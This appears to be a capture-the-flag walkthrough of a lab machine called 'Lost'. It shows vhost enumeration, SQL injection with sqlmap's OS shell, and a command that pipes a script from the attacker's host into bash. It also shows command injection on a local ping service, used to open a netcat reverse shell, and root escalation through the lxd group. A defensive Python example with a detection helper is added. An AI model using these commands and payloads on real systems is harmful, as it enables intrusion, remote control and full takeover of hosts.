# Lab setup

Download: Lost

NAT, IP: 192.168.1.174

# Penetration process

# Initial information gathering

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 65:bb:ae:ef:71:d4:b5:c5:8f:e7:ee:dc:0b:27:46:c2 (ECDSA)
|_  256 ea:c8:da:c8:92:71:d8:8e:08:47:c0:66:e0:57:46:49 (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-title: lost.nyx
|_http-server-header: Apache/2.4.57 (Debian)
```

The page title on port 80 gives a domain name (lost.nyx), so brute-force virtual hosts under it.

```
┌──(root㉿kali)-[~]
└─# gobuster vhost -u lost.nyx -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://lost.nyx
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.lost.nyx Status: 200 [Size: 9936]
Progress: 114441 / 114442 (100.00%)
===============================================================
Finished
===============================================================
```

Add it to the hosts file and take a look at dev.lost.nyx.

Poking around, it falls right away: sqlmap -u http://dev.lost.nyx/passengers.php?id=1 --os-shell --batch

A shell pops up:

```
os-shell> wget -O - http://192.168.1.129:8000/shell.sh|bash
do you want to retrieve the command standard output? [Y/n/a] Y
No output
```

# Privilege escalation

ps -ef shows a user running a web service on port 3000. It would need to be tunnelled out to reach it from the attacker machine, so I just work on it directly on the server:

curl 'http://127.0.0.1:3000/' -X POST --data-raw 'ip=127.0.0.1'

It returns ping output, so try RCE: curl 'http://127.0.0.1:3000/' -X POST --data-raw 'ip=127.0.0.1|id' shows the service runs as jackshephard.

Pop a shell: curl 'http://127.0.0.1:3000/' -X POST --data-raw 'ip=127.0.0.1|busybox${IFS}nc${IFS}192.168.1.129${IFS}4444${IFS}-e${IFS}bash'

Access obtained.
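The port-3000 service splices the `ip` parameter straight into a shell command, which is why `127.0.0.1|id` executes. As an added example (not the target's code; the handler shape is assumed), here is that vulnerable pattern beside a hardened version that validates the value as an IP literal and runs ping without a shell, plus a check a log reviewer or WAF rule could apply to request bodies:

```python
"""Vulnerable vs hardened handling of a ping form's ip= parameter (illustrative, assumed handler)."""
import ipaddress
import subprocess
from urllib.parse import parse_qs

# Shell metacharacters that should never appear in an IP address parameter.
SHELL_META = set("|;&`$<>(){}\n")


def unsafe_ping_command(ip: str) -> str:
    # Vulnerable pattern (assumed): the user value is interpolated into a shell
    # string, so '127.0.0.1|id' becomes 'ping -c 1 127.0.0.1|id'.
    return f"ping -c 1 {ip}"


def safe_ping_argv(ip: str) -> list:
    # Hardened pattern: parse the value as an IP literal (raises ValueError on
    # anything else) and build an argv list, so no shell ever sees the input.
    addr = ipaddress.ip_address(ip.strip())
    return ["ping", "-c", "1", str(addr)]


def is_valid_ping_target(ip: str) -> bool:
    try:
        safe_ping_argv(ip)
        return True
    except ValueError:
        return False


def run_ping(ip: str) -> int:
    # shell=False is the default for a list argv; returns ping's exit status.
    return subprocess.run(safe_ping_argv(ip), capture_output=True, timeout=5).returncode


def suspicious_ip_param(body: str) -> bool:
    # Detection helper for access-log / WAF review: flag a POST body whose
    # ip= value carries shell metacharacters (covers '|id' and '${IFS}' tricks).
    value = parse_qs(body).get("ip", [""])[0]
    return any(ch in SHELL_META for ch in value)


if __name__ == "__main__":
    # Constructed request bodies: one benign, two in the shape seen above.
    for body in ("ip=127.0.0.1", "ip=127.0.0.1|id", "ip=127.0.0.1|busybox${IFS}nc"):
        print(body, "suspicious" if suspicious_ip_param(body) else "ok")
```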

id shows membership of the lxd group, which can be leveraged.

If our user is in the lxd group, we can deploy a container (a machine) that runs as root and escalate privileges by mounting the host's entire root directory "/" into /mnt/root inside the container. Once it is created, we have root access to every file and directory under / that we previously could not read, create or modify.

```bash
# On the attacker machine
wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
sudo bash build-alpine
# On the victim machine
lxc image import <generated alpine tar.gz> --alias alpine   # import the image
lxc image list                                              # list images to confirm it was created
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true   # mount the host's / at /mnt/root
lxc start privesc
lxc exec privesc sh
```

Privileges obtained.